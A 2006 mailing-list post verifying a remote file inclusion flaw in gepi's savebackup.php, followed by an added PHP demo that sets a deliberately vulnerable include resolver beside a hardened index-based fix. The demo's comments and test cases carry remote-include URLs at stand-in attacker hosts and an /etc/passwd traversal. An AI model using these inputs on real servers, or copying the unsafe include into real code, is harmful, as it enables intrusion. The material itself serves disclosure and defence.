[VIM] Source VERIFY and patch for gepi RFI
Steven M. Christey
coley at mitre.org
Thu Nov 2 19:07:56 EST 2006
Reference: http://www.milw0rm.com/exploits/2692
Researcher: $um$id
Version 1.4.0 has this in gestion/savebackup.php:
include($_GET['filename']);
with no cleansing of $_GET beforehand, so that's a pretty clear issue.
Looking at version 1.4.4, a diff shows a lot of changes being made to
savebackup.php, including session checking (not shown below) and
whitelisting of possibly valid filenames (!!!!):
$dirname = getSettingValue("backup_directory");
...
$handle=opendir('../backup/' . $dirname);
$tab_file = array();
...
[populate $tab_file with files in the directory]
...
$m = 0;
foreach($tab_file as $value) {
    if ($m == $_GET['fileid']) {
        $filepath = "../backup/".$dirname."/".$value;
        $filename = $value;
    }
    $m++;
}
...
include($filepath);
For those who keep track, gepi-1.4.4 was created Oct 16, but the
vulnerability disclosure was apparently Oct 31.
I didn't look at versions between 1.4.0 and 1.4.4.
- Steve
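Editor's added example, not code from gepi or from the post above: the 1.4.0 pattern (the include target taken straight from the request) beside an index-based lookup in the spirit of the 1.4.4 savebackup.php excerpt. The function names, the scratch backup directory and the sample inputs are constructed for the demonstration. The index lookup here validates fileid as a canonical non-negative integer, returns null instead of leaving the path unset when nothing matches, and confirms with realpath() that the chosen entry still resolves inside the backup directory.

```php
<?php
// Added example (hypothetical names), not gepi's code.
declare(strict_types=1);

// 1.4.0-style: whatever the client sends becomes the include target.
// With allow_url_include on, ?filename=http://evil/shell.txt is remote
// inclusion; with it off, ?filename=../../../../etc/passwd is still
// local inclusion. Nothing is checked.
function resolveBackupUnsafe(array $get): string
{
    return $get['filename'];
}

// 1.4.4-style: the client only picks a position in a server-side listing,
// so the result is always a file actually present in $backupDir.
function resolveBackupByIndex(string $backupDir, array $get): ?string
{
    // Accept only "0", "1", "42"... ("1abc" or "03" are rejected, where a
    // loose == comparison against an integer counter would accept "1abc").
    $fileid = $get['fileid'] ?? null;
    if (!is_string($fileid) || !preg_match('/^(0|[1-9][0-9]*)$/', $fileid)) {
        return null;
    }
    $index = (int) $fileid;

    // Build the listing deterministically: regular files only, sorted.
    $entries = scandir($backupDir, SCANDIR_SORT_ASCENDING);
    if ($entries === false) {
        return null;
    }
    $files = [];
    foreach ($entries as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        if (is_file($backupDir . '/' . $entry)) {
            $files[] = $entry;
        }
    }

    if (!array_key_exists($index, $files)) {
        return null; // out of range: nothing to include
    }

    // The chosen entry must resolve inside $backupDir even if it is a
    // symlink planted there that points elsewhere.
    $path = realpath($backupDir . '/' . $files[$index]);
    $base = realpath($backupDir);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a scratch backup directory with two files.
$dir = sys_get_temp_dir() . '/gepi-backup-demo-' . getmypid();
mkdir($dir, 0700);
file_put_contents($dir . '/backup1.sql', "-- constructed backup 1\n");
file_put_contents($dir . '/backup2.sql', "-- constructed backup 2\n");

$cases = [
    ['fileid' => '0'],
    ['fileid' => '1'],
    ['fileid' => '2'],                    // out of range
    ['fileid' => '1abc'],                 // loose == would match index 1
    ['fileid' => '../../etc/passwd'],
    ['filename' => 'http://attacker.example/shell.txt'],
];
foreach ($cases as $get) {
    $unsafe = isset($get['filename']) ? resolveBackupUnsafe($get) : '(no filename param)';
    $safe = resolveBackupByIndex($dir, $get) ?? 'rejected';
    printf("%-45s unsafe=%s  byIndex=%s\n", json_encode($get), $unsafe, $safe);
}

// Remove the scratch directory.
array_map('unlink', glob($dir . '/*'));
rmdir($dir);
```

Run it with `php example.php`; the two valid indices resolve to the scratch files, every other input is rejected, and the unsafe resolver hands the attacker-supplied URL straight back, which is exactly what include() would then fetch.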